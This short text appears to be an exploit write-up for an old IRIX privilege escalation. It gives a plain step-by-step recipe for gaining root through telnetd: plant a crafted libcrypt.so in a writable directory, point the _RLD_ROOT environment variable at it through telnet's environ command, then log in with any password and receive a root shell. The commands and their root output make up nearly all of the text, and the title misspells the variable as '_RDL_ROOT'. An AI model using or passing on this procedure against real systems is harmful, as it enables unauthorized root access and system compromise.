libcrypt.so, _RDL_ROOT telnetd env var root exploit for irix

Put this in usr/lib under any directory you have write access to, then
do something like this (assuming you're putting libcrypt.so in
/tmp/usr/lib):


$ mkdir /tmp/usr
$ mkdir /tmp/usr/lib
$ cp libcrypt.so /tmp/usr/lib/
$ cp /usr/lib/libgen.so /tmp/usr/lib/
$ cp /usr/lib/libc.so.1 /tmp/usr/lib/
$ cp /usr/lib/libcurses.so /tmp/usr/lib/
$ telnet
telnet> environ define _RLD_ROOT /tmp
telnet> o localhost

IRIX (blah)

login: blah
Password: blah (doesn't matter what you put here)
# whoami
root
